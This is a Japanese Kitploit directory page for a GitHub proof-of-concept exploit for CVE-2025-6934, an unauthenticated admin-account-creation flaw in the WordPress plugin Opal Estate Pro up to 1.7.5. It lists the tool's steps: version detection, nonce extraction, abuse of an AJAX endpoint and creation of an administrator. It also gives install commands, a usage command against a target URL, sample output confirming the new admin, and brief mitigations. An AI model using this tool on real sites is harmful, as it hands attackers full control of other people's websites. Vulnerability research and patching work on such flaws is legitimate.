Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-6934 | Kitploit
ツール/GitHubGitHub/yukinime/cve-2025-6934
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubyukinime/cve-2025-6934

CVE-2025-6934

リポジトリを見る
5311ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-6934 – WordPress Opal Estate Pro のエクスプロイト

WordPress ロゴ

📖 説明
このリポジトリには CVE-2025-6934 の概念実証 (PoC) エクスプロイトが含まれています。
これは WordPress プラグイン: Opal Estate Pro <= 1.7.5 の重大な脆弱性であり、認証なしで管理者アカウントを作成できるものです。

⚠️ 免責事項: このツールは教育およびセキュリティ研究の目的でのみ提供されています。
著者は、誤用や損害について一切責任を負いません。


🚀 機能

  • readme.txt からプラグインのバージョンを自動検出
  • 登録用の nonce を抽出
  • 脆弱な AJAX エンドポイントを悪用
  • 新しい管理者アカウントを作成

🔧 インストール

リポジトリをクローンして依存関係をインストールします:

root@kitploit:~
git clone https://github.com/yukinime/CVE-2025-6934.git
cd CVE-2025-6934

pip3 install -r requirements.txt

requirements.txt

root@kitploit:~
requests
beautifulsoup4
colorama

▶️ 使用方法

ターゲットを指定してスクリプトを実行します:

root@kitploit:~
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin

✅ 出力例:

root@kitploit:~
[✔] Eksploitasi Berhasil!
    Username : newadmin
    Email    : [email protected]
    Password : MySecurePass123
    Role     : administrator

📸 スクリーンショット

エクスプロイトのスクリーンショット


🛡️ 緩和策

  • プラグインを最新バージョンに更新する
  • または、脆弱なプラグインを直ちに無効化する
  • WordPress ログを監視して不正なアカウント作成を検出する

👤 著者

Cyberlone Indonesia (Cyberlone)


📜 ライセンス

このプロジェクトは MIT License の下でライセンスされています。詳細は LICENSE をご覧ください。

ツールをダウンロード